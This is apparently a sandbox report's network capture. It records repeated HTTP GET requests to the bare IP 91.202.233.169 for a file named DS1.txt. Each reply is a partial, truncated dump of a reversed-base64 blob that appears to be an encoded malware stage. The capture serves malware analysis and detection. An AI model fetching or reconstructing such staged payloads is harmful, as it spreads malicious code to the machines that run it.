Sep 26, 2024 10:57:02.479974031 CEST	89	OUT	GET /Tak/Reg/Marz/ENVS/DS1.txt HTTP/1.1 Host: 91.202.233.169 Connection: Keep-Alive
Sep 26, 2024 10:57:03.208159924 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 26 Sep 2024 08:57:03 GMT Content-Type: text/plain Content-Length: 64856 Connection: keep-alive Last-Modified: Mon, 16 Sep 2024 11:16:55 GMT ETag: "fd58-6223ab5def7c0" Accept-Ranges: bytes Vary: Accept-Encoding Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7AMAAAADAAAwAAAAAAAAAAAAAoQD+kHbi1WZzNXYvwjCNoQD+0SLgAiCN4Tej5WZk5WZwVGZvwDIgoQD+kHbi1WZzNXQ05WZk5WZwVGZvwDIgACIK0gPvACIgACIgACIK0gIqISPldWY1dmbhxGIgACIgACIgACIK0gImRWMmN2Y0QTM0YjY1kTN2ISPuV2avRVelt0YpxmY1BHIgACIgACIgACIK0gIqISPlJXd0NWZ0lGajJXQy92czV2YvJHcgACIgACIgACIgoQDiAjLw4CMuYjI942bpNnclZ
Sep 26, 2024 10:57:03.208188057 CEST	224	IN	Data Raw: 48 49 67 41 43 49 67 41 43 49 67 41 43 49 4b 30 67 49 7a 78 32 62 79 52 6e 62 76 4e 55 4c 75 39 57 62 74 39 32 51 75 4d 33 64 76 52 6d 62 70 64 6c 4c 30 5a 32 62 7a 39 6d 63 6a 6c 57 54 69 30 54 5a 74 46 6d 62 67 41 43 49 67 41 43 49 67 41 43 49 Data Ascii: HIgACIgACIgACIK0gIzx2byRnbvNULu9Wbt92QuM3dvRmbpdlL0Z2bz9mcjlWTi0TZtFmbgACIgACIgACIgoQDiIzMul2di0TZwlHdgACIgACIgACIgoQD5RXa05WZklUesJWblN3chxDIgACIgAiCN4TesJWblN3cBRnblRmblBXZkxDIgACIK0gP5NmblRmblBXZkxDIgoQDt0SI8ACIK0gPt0CIpI
Sep 26, 2024 10:57:03.208201885 CEST	1236	IN	Data Raw: 58 5a 30 46 47 62 67 51 6d 62 68 42 43 55 59 42 79 63 33 39 47 5a 75 6c 32 56 6f 41 79 63 6e 39 47 62 68 6c 47 5a 67 51 6d 62 68 42 79 63 73 39 6d 63 30 35 32 62 6a 42 69 62 76 31 57 62 76 4e 47 49 7a 64 33 62 6b 35 57 61 58 42 69 63 76 5a 47 49 Data Ascii: XZ0FGbgQmbhBCUYByc39GZul2VoAycn9GbhlGZgQmbhBycs9mc052bjBibv1WbvNGIzd3bk5WaXBicvZGIzVWblhGdgUGbiFmbFBSLtECPgAiCNoQDK0gPu9Wa0F2YpxGcwF2L8ACIK0gPzdmbpRHdlN1c39GZul2dvwDIgACIK0gPlJXY3FEa0FGUn52bs9CPlVnc05jIzdmbpRHdlN1c39GZul2VvYTMwIzLJ10Uv02bj5Cdm
Sep 26, 2024 10:57:03.208216906 CEST	224	IN	Data Raw: 58 59 6a 6c 47 62 77 42 58 59 67 55 47 61 30 42 43 64 68 68 47 64 67 4d 58 5a 30 46 32 59 70 52 6d 62 4a 42 53 4c 74 45 43 50 67 41 69 43 4e 6f 51 44 2b 6b 48 64 70 78 57 61 69 6c 47 64 68 42 58 62 76 4e 32 4c 38 41 43 49 4b 30 67 50 75 39 57 61 Data Ascii: XYjlGbwBXYgUGa0BCdhhGdgMXZ0F2YpRmbJBSLtECPgAiCNoQD+kHdpxWailGdhBXbvN2L8ACIK0gPu9Wa0F2YpxGcwF2L8ACIgAiCNoQD+0SL+8CIi0XY5EWNxEGM1QmZ4QTL1EWOi1COlZGNtMjYmJWLyETY3YGMlhzei0DZJByUPRWZ0J3bwBXdzxTLtECPgACIgACIK0gPt0CIwEDIzd3bk5WaXB
Sep 26, 2024 10:57:03.208230019 CEST	1236	IN	Data Raw: 53 4c 74 45 43 50 67 41 43 49 67 41 43 49 4b 30 67 43 4e 34 54 4c 74 34 7a 4c 67 49 53 66 34 63 54 59 6b 42 44 5a 32 59 47 4d 6b 4e 44 4f 74 49 6d 59 31 6b 54 4c 35 4d 6a 4d 30 30 53 4d 6c 42 44 4f 74 59 7a 4e 6a 5a 7a 4e 32 59 57 4d 37 4a 53 50 Data Ascii: SLtECPgACIgACIK0gCN4TLt4zLgISf4cTYkBDZ2YGMkNDOtImY1kTL5MjM00SMlBDOtYzNjZzN2YWM7JSPklEIT9EZlRncvBHc1NHPt0SI8ACIgACIgoQD+0SLgEjL4Ayc39GZul2Vg0SLhwDIgACIgAiCNoQD+0SL+8CIi0HOzUmNhRTY0QWO2QWLjlTYi1SM0QDNtkjYzUTLzUGOyYmMhRzei0DZJByUPRWZ0J3bwBXdzxTLt
Sep 26, 2024 10:57:03.208288908 CEST	1236	IN	Data Raw: 57 62 6c 68 32 59 7a 70 6a 62 79 56 6e 49 39 4d 6e 62 73 31 47 65 67 4d 58 5a 6e 56 47 62 70 5a 58 61 79 42 46 5a 6c 52 33 63 6c 56 58 63 6c 4a 48 50 67 41 43 49 67 41 43 49 4b 30 67 50 35 52 58 61 79 56 33 59 6c 4e 48 50 67 41 43 49 67 6f 51 44 Data Ascii: Wblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3YlNHPgACIgoQD+IiM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIvZmbJR3c1JHd8ACIK0gPvICcwFmLu9Wa0F2YpxGcwFUeNJSPl1WYuBiIw4yNuAjLxISPu9WazJXZ2BSe0lGduVGZJlHbi1WZzNXY8ACIK
Sep 26, 2024 10:57:03.208311081 CEST	1236	IN	Data Raw: 41 41 41 41 41 52 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 2f 41 77 42 41 41 41 41 42 41 41 41 41 63 41 41 41 41 51 41 41 41 41 41 42 41 41 41 2b 2f 4f 42 39 43 41 41 41 41 41 41 Data Ascii: AAAAARAAAAAAAAAAAAAAAAAAAABAAAAQAAAAAAAAAA/AwBAAAABAAAAcAAAAQAAAAABAAA+/OB9CAAAAAAPBgRA4EAJBwXA4EAPBQSAMFASBQRAYFAfBwUAYFAAAANCQNAAAAAAAAAAAAAKMIAAMOdAAAAAAAAAAAAAIA1AAA4gCAAAAJAAAAAAEAAAAAAAAAAAAAAAAAAAAIAAgGAAAQAAEAAAAAAAAAAAAAAAAAAAAAAAAIAA
Sep 26, 2024 10:57:03.208425045 CEST	1236	IN	Data Raw: 69 42 35 47 6f 45 42 63 51 42 4f 55 6d 45 43 63 51 42 4e 46 52 54 52 49 67 41 41 63 51 54 52 41 41 49 45 30 6c 45 64 41 41 41 46 30 6c 45 49 30 6c 45 64 4d 77 42 49 67 67 44 42 41 43 42 4f 77 52 41 67 51 67 44 4a 49 6f 45 31 48 6f 45 39 48 6f 45 Data Ascii: iB5GoEBcQBOUmECcQBNFRTRIgAAcQTRAAIE0lEdAAAF0lEI0lEdMwBIggDBACBOwRAgQgDJIoE1HoE9HoEOUwBN0jgRIQAgYQNCKRABAiB1IoEAAQBlIYEAASBO4gDCASBlIYECIwBGgACOIAIF4QZSEAIFwRHOEAAFUhgSAAAF4QBIUQHlJRBd4wBHwgDcIwBEgRVS0BCIMAIIwBCBAABBMBATIwECACCcARTRARVS0ggSEABg
Sep 26, 2024 10:57:03.208439112 CEST	1236	IN	Data Raw: 50 67 53 6b 50 67 53 67 51 2b 41 4b 52 48 49 34 41 43 48 51 52 42 64 34 51 42 64 49 77 41 67 67 67 44 4f 45 41 41 45 34 51 42 64 45 41 49 46 55 4f 67 53 41 41 49 46 45 4f 67 53 41 41 49 46 49 51 33 41 4b 52 32 41 4b 78 41 48 6b 51 42 64 34 51 41 Data Ascii: PgSkPgSgQ+AKRHI4ACHQRBd4QBdIwAgggDOEAAE4QBdEAIFUOgSAAIFEOgSAAIFIQ3AKR2AKxAHkQBd4QAgUQ1AKBAAUgABcwAOgQAAQACBcwAAAQblRXSEAQAJAAAxUDOCJENwATQBBDMtUzMxgTLFNUMx0iQDJDNtADMBJzNyUTNkAQApAAAAAAABAQAIUMgREQAgYAAAYDOFNUMxkzQwEEMw0iQzQkQtADRxETL0gjQ10iMy
Sep 26, 2024 10:57:03.208455086 CEST	1236	IN	Data Raw: 51 47 53 55 52 41 41 6b 67 44 64 41 41 41 45 30 55 45 47 4d 41 42 42 65 78 41 59 59 67 41 4a 59 67 41 49 67 68 41 43 41 51 42 59 49 51 41 41 51 51 43 43 6b 41 47 44 41 67 42 73 45 42 45 59 49 67 41 41 63 51 43 4a 67 68 41 41 55 51 43 42 45 41 41 Data Ascii: QGSURAAkgDdAAAE0UEGMABBexAYYgAJYgAIghACAQBYIQAAQQCCkAGDAgBsEBEYIgAAcQCJghAAUQCBEAAE4gDCIAAFEAZhVmcoRFbvJHdu92QNIAVBIRO4ATZ0MTOxYTNjVTY3cjY94WZr9GV5V2SjlGbiVHUgwCbhJHd1Vmb9Umc1RHb1NEIsAjLw4CMuQTPu9WazJXZWBCLilGby92Yz1GIsUGd1JWayRHdB52bpN3cp1mcl
Sep 26, 2024 10:57:03.213269949 CEST	1236	IN	Data Raw: 48 41 7a 42 51 59 41 30 32 52 41 41 41 58 41 55 47 41 79 42 51 59 41 63 48 41 30 42 67 5a 41 38 47 41 54 4e 52 41 41 4d 48 41 6e 42 67 62 41 6b 47 41 30 42 41 64 41 55 47 41 7a 42 51 4c 41 4d 48 41 74 64 42 41 41 55 47 41 73 42 51 61 41 59 47 41 Data Ascii: HAzBQYA02RAAAXAUGAyBQYAcHA0BgZA8GATNRAAMHAnBgbAkGA0BAdAUGAzBQLAMHAtdBAAUGAsBQaAYGAjBwcA02DAAwcAUGAzBwcAEGAsBwQPAAAlBgcAEGA3BAdAYGAvBwURAAAyBQaAQGAuBQaAcXDAAAdA4GAlBQbA4GAvBgcAkGA2BgbAU0FAAgbAcHAvBgbAsGAuBQVPAAABBwLA40BAAAIAsTBAAQZA0GAhBgTAkHAh

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 10:57:24.051206112 CEST	89	OUT	GET /Tak/Reg/Marz/ENVS/DS1.txt HTTP/1.1 Host: 91.202.233.169 Connection: Keep-Alive
Sep 26, 2024 10:57:24.776057959 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 26 Sep 2024 08:57:24 GMT Content-Type: text/plain Content-Length: 64856 Connection: keep-alive Last-Modified: Mon, 16 Sep 2024 11:16:55 GMT ETag: "fd58-6223ab5def7c0" Accept-Ranges: bytes Vary: Accept-Encoding Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7AMAAAADAAAwAAAAAAAAAAAAAoQD+kHbi1WZzNXYvwjCNoQD+0SLgAiCN4Tej5WZk5WZwVGZvwDIgoQD+kHbi1WZzNXQ05WZk5WZwVGZvwDIgACIK0gPvACIgACIgACIK0gIqISPldWY1dmbhxGIgACIgACIgACIK0gImRWMmN2Y0QTM0YjY1kTN2ISPuV2avRVelt0YpxmY1BHIgACIgACIgACIK0gIqISPlJXd0NWZ0lGajJXQy92czV2YvJHcgACIgACIgACIgoQDiAjLw4CMuYjI942bpNnclZ
Sep 26, 2024 10:57:24.776106119 CEST	1236	IN	Data Raw: 48 49 67 41 43 49 67 41 43 49 67 41 43 49 4b 30 67 49 7a 78 32 62 79 52 6e 62 76 4e 55 4c 75 39 57 62 74 39 32 51 75 4d 33 64 76 52 6d 62 70 64 6c 4c 30 5a 32 62 7a 39 6d 63 6a 6c 57 54 69 30 54 5a 74 46 6d 62 67 41 43 49 67 41 43 49 67 41 43 49 Data Ascii: HIgACIgACIgACIK0gIzx2byRnbvNULu9Wbt92QuM3dvRmbpdlL0Z2bz9mcjlWTi0TZtFmbgACIgACIgACIgoQDiIzMul2di0TZwlHdgACIgACIgACIgoQD5RXa05WZklUesJWblN3chxDIgACIgAiCN4TesJWblN3cBRnblRmblBXZkxDIgACIK0gP5NmblRmblBXZkxDIgoQDt0SI8ACIK0gPt0CIpIXZ0FGbgQmbhBCUYByc3
Sep 26, 2024 10:57:24.776145935 CEST	1236	IN	Data Raw: 53 5a 79 46 32 64 68 31 53 53 51 52 45 49 35 78 47 62 68 4e 57 61 30 46 57 62 76 52 58 64 68 42 53 5a 79 46 47 49 7a 35 32 62 70 52 58 59 6a 6c 47 62 77 42 58 59 67 6b 69 52 51 64 46 4b 67 34 32 62 70 52 58 59 6b 35 57 64 76 5a 45 49 75 39 57 61 Data Ascii: SZyF2dh1SSQREI5xGbhNWa0FWbvRXdhBSZyFGIz52bpRXYjlGbwBXYgkiRQdFKg42bpRXYk5WdvZEIu9Wa0FGduV2clJHUgM3dvRmbpdFIuMXSQREIgACIgACIK0gclh2ZphGI0FGIzd3bk5WaXBSeiBCZlxWYjNHI5xGbhNWa0FWbvRXdhBSZiBCdv5GIsxWa3BCZuFGIlJXY3FWLJBFRgMXag42bpRXYjlGbwBXYgUGa0BCdh
Sep 26, 2024 10:57:24.776180029 CEST	1236	IN	Data Raw: 51 44 75 39 47 49 6b 56 47 64 7a 56 47 64 67 34 57 5a 6c 4a 47 49 7a 46 47 61 67 34 32 62 70 52 58 59 6a 6c 47 62 77 42 58 59 67 4d 58 61 6f 52 48 49 30 46 47 61 30 42 79 63 75 39 57 61 7a 4a 58 5a 32 42 79 63 33 39 47 5a 75 6c 32 56 67 55 47 61 Data Ascii: QDu9GIkVGdzVGdg4WZlJGIzFGag42bpRXYjlGbwBXYgMXaoRHI0FGa0Bycu9WazJXZ2Byc39GZul2VgUGa0BiZvBCdzlGbgEEIt0SI8ACIgACIgoQD+42bpRXYjlGbwBXY8ACIgAiCN4jIxYnL5RXaslmYpRXYw12bjpTbvNWL0Z2bz9mcjlWbtMXYtVGajNnOuJXdi0zcuxWb4BSe0lGbpJWa0FGct92Y8ACIK0gCN4zbm5WS0
Sep 26, 2024 10:57:24.776215076 CEST	1236	IN	Data Raw: 43 41 41 41 41 41 41 55 47 41 34 42 51 5a 41 34 43 41 30 42 67 62 41 55 47 41 70 42 41 62 41 4d 45 41 41 41 51 5a 41 30 47 41 68 42 67 54 41 77 47 41 68 42 67 62 41 49 48 41 6c 42 41 64 41 34 47 41 4a 42 51 41 41 73 41 41 32 41 41 41 41 41 44 41 Data Ascii: CAAAAAAUGA4BQZA4CA0BgbAUGApBAbAMEAAAQZA0GAhBgTAwGAhBgbAIHAlBAdA4GAJBQAAsAA2AAAAADAuAwNA4CAwAgLAEDAAAAAA4GAvBQaAMHAyBQZAYFAlBAbAkGAGBQAAgAAwAAAAAAAAAAAA4GAvBQaAQHAwBQaAIHAjBwcAUGAEBQZAwGApBgRAEAABAgKAAAAAAAAAAAAlBQbAEGAOBQeA4GAhBAcA0GAvBwQAEAAB
Sep 26, 2024 10:57:24.776251078 CEST	1120	IN	Data Raw: 59 45 4f 45 41 42 67 30 51 33 42 4b 52 42 64 49 77 42 48 77 51 42 64 45 41 41 46 55 69 67 52 77 58 45 43 63 77 42 4f 30 51 41 41 51 67 43 4e 45 41 41 45 55 69 67 52 6f 51 41 41 59 41 44 4b 45 41 41 45 30 67 43 42 41 41 42 4f 6f 51 41 41 51 67 43 Data Ascii: YEOEABg0Q3BKRBdIwBHwQBdEAAFUigRwXECcwBO0QAAQgCNEAAEUigRoQAAYADKEAAE0gCBAABOoQAAQgCKEAAEUigRsQAAYADLEAAE0wCBAABOsQAAQgCLEAAEwXEBcABFEQAgQACF0RBIQwBHgnE4JRAlFYEV4ACIUwBOgnEBcABIAwEBASBIgQBdMwBGwhDOIAAFUACF0RZSQwBIggACcABIgQiCKBCJKoEBUAAMUQHF0RBd
Sep 26, 2024 10:57:24.776287079 CEST	1236	IN	Data Raw: 52 4e 53 6f 51 4d 53 55 78 45 41 4d 68 42 44 45 5a 67 53 41 77 45 42 30 69 45 56 45 41 41 4c 34 67 44 4f 6b 6a 45 46 30 68 44 4a 49 52 44 53 77 52 4e 53 6f 51 4d 53 55 52 41 74 49 52 46 58 55 59 67 53 45 51 62 42 4b 52 46 35 46 6f 45 35 46 6f 45 Data Ascii: RNSoQMSUxEAMhBDEZgSAwEB0iEVEAAL4gDOkjEF0hDJIRDSwRNSoQMSURAtIRFXUYgSEQbBKRF5FoE5FoEB0WgSUhDVGYERGoEFAAHOkYgRUYgSIAAJEYgRkXgSEAAIkXgSwRAAYgD5FoEBAiBF0RdBKRAgcQcBKBAAUAHBcwAAMhABASBAMBAgQAeSEQZBGRFHAwEBUWgRUBAgkAeSEgCEAgHB0WgSUBAeEQGSURABABEAMRAB
Sep 26, 2024 10:57:24.776320934 CEST	1236	IN	Data Raw: 6e 45 41 41 43 42 38 46 42 41 67 51 41 64 53 41 41 49 45 30 51 41 42 41 43 42 4d 45 51 41 67 51 67 41 42 45 41 49 45 34 41 41 67 4d 67 44 43 45 41 49 45 67 67 44 42 49 41 49 46 34 67 44 42 49 41 49 46 55 51 48 41 41 43 42 46 30 52 41 42 41 53 42 Data Ascii: nEAACB8FBAgQAdSAAIE0QABACBMEQAgQgABEAIE4AAgMgDCEAIEggDBIAIF4gDBIAIFUQHAACBF0RABASBNAAIDoAAgMwCAAyALEQAgQgCBEAIE0nEBEAIF4ACBACB0JhBDwXEGMACAgyAIgnEBgSBIAAIDgAeSEAIF0AeSEAIFoAeSEAIF4AeSEAIFgnEAACB4JRAZIRF4JRACAyC4JhBDwBAoMgAAAyAcAAIDgnEBkhEVEQAg
Sep 26, 2024 10:57:24.776359081 CEST	1236	IN	Data Raw: 68 42 44 6b 67 45 47 4d 67 44 47 49 51 41 41 41 79 41 42 41 41 41 44 6b 49 34 30 6b 68 56 63 70 33 74 49 41 41 36 38 66 45 55 4b 75 4f 72 4a 4f 45 50 67 65 57 52 65 33 6a 36 41 41 41 41 35 41 77 59 41 51 43 41 73 41 41 4f 41 4d 47 41 6b 41 41 4c Data Ascii: hBDkgEGMgDGIQAAAyABAAADkI40khVcp3tIAA68fEUKuOrJOEPgeWRe3j6AAAA5AwYAQCAsAAOAMGAkAALAcDAjBAJAACAlBAcAkHA0BAIAkCAyAwMAgHAlBALAYDAxAAdAgHAlBALAgDA0BAeAUGAoUEAAEDAjBAJAACAlBAcAkHA0BAIAkCAkBQZAMHA1BAIAIHAlBgdAUGAuBAKrAAAgAQfAIDAYBgOAADA79AAAACA9BwMA
Sep 26, 2024 10:57:24.776390076 CEST	104	IN	Data Raw: 30 43 41 41 41 64 41 6b 47 41 69 42 41 4e 41 59 7a 43 41 41 51 5a 41 55 48 41 79 42 41 56 4a 41 41 41 67 4d 41 41 41 51 48 41 6d 42 77 62 41 4d 48 41 76 42 67 63 41 4d 47 41 70 42 51 54 54 41 41 41 54 42 77 54 46 41 41 41 79 42 51 5a 41 4d 48 41 Data Ascii: 0CAAAdAkGAiBANAYzCAAQZAUHAyBAVJAAAgMAAAQHAmBwbAMHAvBgcAMGApBQTTAAATBwTFAAAyBQZAMHAVlAAAQEAJBwVAgUCAAwbAY
Sep 26, 2024 10:57:24.781296015 CEST	1236	IN	Data Raw: 47 41 75 42 51 53 41 51 48 41 75 42 51 5a 41 6b 47 41 73 42 77 51 56 41 41 41 45 42 51 53 41 63 46 41 49 42 41 49 41 49 48 41 79 42 51 52 52 41 41 41 79 41 41 65 46 41 41 41 6c 42 51 62 41 45 47 41 4f 42 51 65 41 77 47 41 6b 42 67 62 41 55 47 41 Data Ascii: GAuBQSAQHAuBQZAkGAsBwQVAAAEBQSAcFAIBAIAIHAyBQRRAAAyAAeFAAAlBQbAEGAOBQeAwGAkBgbAUGApBgcAYUGBAQfAEDA1AAOAIEACBANAADAwAQQAEEAwAAMA0CA1AwMAEDA4AQLAUEADBQMAEDAtAgQAMEAyAANA0CAwAAMAEEAyAwNAIDA1AQNAsXTBAQfAYDA4AQRAMEAxAQMAkDADBAMAEEAwAAMA0CACBwMAQEAC

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 10:58:03.669411898 CEST	89	OUT	GET /Tak/Reg/Marz/ENVS/DS1.txt HTTP/1.1 Host: 91.202.233.169 Connection: Keep-Alive
Sep 26, 2024 10:58:04.406827927 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 26 Sep 2024 08:58:04 GMT Content-Type: text/plain Content-Length: 64856 Connection: keep-alive Last-Modified: Mon, 16 Sep 2024 11:16:55 GMT ETag: "fd58-6223ab5def7c0" Accept-Ranges: bytes Vary: Accept-Encoding Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7AMAAAADAAAwAAAAAAAAAAAAAoQD+kHbi1WZzNXYvwjCNoQD+0SLgAiCN4Tej5WZk5WZwVGZvwDIgoQD+kHbi1WZzNXQ05WZk5WZwVGZvwDIgACIK0gPvACIgACIgACIK0gIqISPldWY1dmbhxGIgACIgACIgACIK0gImRWMmN2Y0QTM0YjY1kTN2ISPuV2avRVelt0YpxmY1BHIgACIgACIgACIK0gIqISPlJXd0NWZ0lGajJXQy92czV2YvJHcgACIgACIgACIgoQDiAjLw4CMuYjI942bpNnclZ
